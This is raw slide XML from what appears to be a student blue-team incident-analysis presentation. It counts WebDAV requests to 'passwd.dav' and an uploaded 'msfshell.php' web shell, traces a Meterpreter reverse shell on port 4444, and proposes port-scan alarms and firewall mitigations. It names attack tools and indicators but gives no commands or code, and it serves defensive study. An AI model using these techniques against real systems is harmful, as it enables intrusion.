              <a:t>Success</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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Analysis: Finding the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Google Shape;1221;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367200" y="1467720"/>
            <a:ext cx="8408880" cy="2383920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1d8be6">
              <a:alpha val="15000"/>
            </a:srgbClr>
          </a:solid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1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>[Insert Here]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Add a screenshot of Kibana logs depicting the WebDAV connection.  </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367200" y="588960"/>
            <a:ext cx="8534880" cy="971280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="91440" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="320040" indent="-167760">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>There was a total of 42 requests counted to the WebDAV directory.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="320040" indent="-167760">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>18 requests were made to the “passwd.dav” file.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="320040" indent="-167760">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>14 requests were made to the uploaded “msfshell.php” file.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="397" name="Google Shape;1223;p69" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367200" y="835200"/>
            <a:ext cx="424440" cy="330840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="398" name="Google Shape;1224;p69" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1467720"/>
            <a:ext cx="9143640" cy="34326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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Analysis: Identifying the Meterpreter Session (Reverse Shell)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Google Shape;1231;p70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367200" y="1467720"/>
            <a:ext cx="8408880" cy="2383920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1d8be6">
              <a:alpha val="15000"/>
            </a:srgbClr>
          </a:solid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1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>[Insert Here]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Add a screenshot of Kibana logs depicting the WebDAV connection.  </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="402" name="Google Shape;1232;p70" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1253880"/>
            <a:ext cx="9143640" cy="5249160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="403" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367200" y="588960"/>
            <a:ext cx="8534880" cy="971280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="91440" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="320040" indent="-161280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Port 4444 is usually used for Trojans for a reverse shell or shell access.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="320040" indent="-161280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>With the search set for connections to port 4444, we can see there was a connection established around 3:16am with data transfer happening around 3:23am. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="404" name="Google Shape;1234;p70" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367200" y="835200"/>
            <a:ext cx="424440" cy="33084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5" name="Google Shape;1239;p71" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="289800"/>
            <a:ext cx="8595000" cy="4593240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="1631160"/>
            <a:ext cx="8595000" cy="2025720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="3400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Proposed Alarms and </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en" sz="3400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Google Shape;1241;p71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607600" y="4957200"/>
            <a:ext cx="261720" cy="105120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{17BA36E6-D22F-420B-B8ED-B4BD7C7BD03E}" type="slidenum">
              <a:rPr b="0" lang="en" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="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12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Mitigation: Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="1602360"/>
            <a:ext cx="4298040" cy="3051000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Set up an alarm or configure IDS sensors to detect normal TCP connections that do not actually send any data, indicating a port scan is occurring. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>The threshold should be set to trigger an alarm if there is any port scans being performed, where there is more than 1 port connection made in the last minute without any data being sent.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466880" y="1604880"/>
            <a:ext cx="4298040" cy="3301560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="111111"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="ffffff"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>You can't block the act of port scanning itself. The best thing you can do is adjust your Firewall/ router settings to close/ disable any incoming and outgoing ports that are not being used to prevent network holes with unused or vulnerable ports. Requests to these ports can also be filtered to authorized applications so that responses show up as blocked during a port scan.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="111111"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="ffffff"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Logging applications should trigger alarms to begin the response procedures needed to verify or block the port scan being performed. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>An added solution should be to regularly perform a port scan on your own network to determine if there are more ports opened than required and scan for any vulnerable ports that have been left open and not in use that may have been filtered by the Firewall/ router settings.</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12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Table of Contents</a:t>
            </a:r>
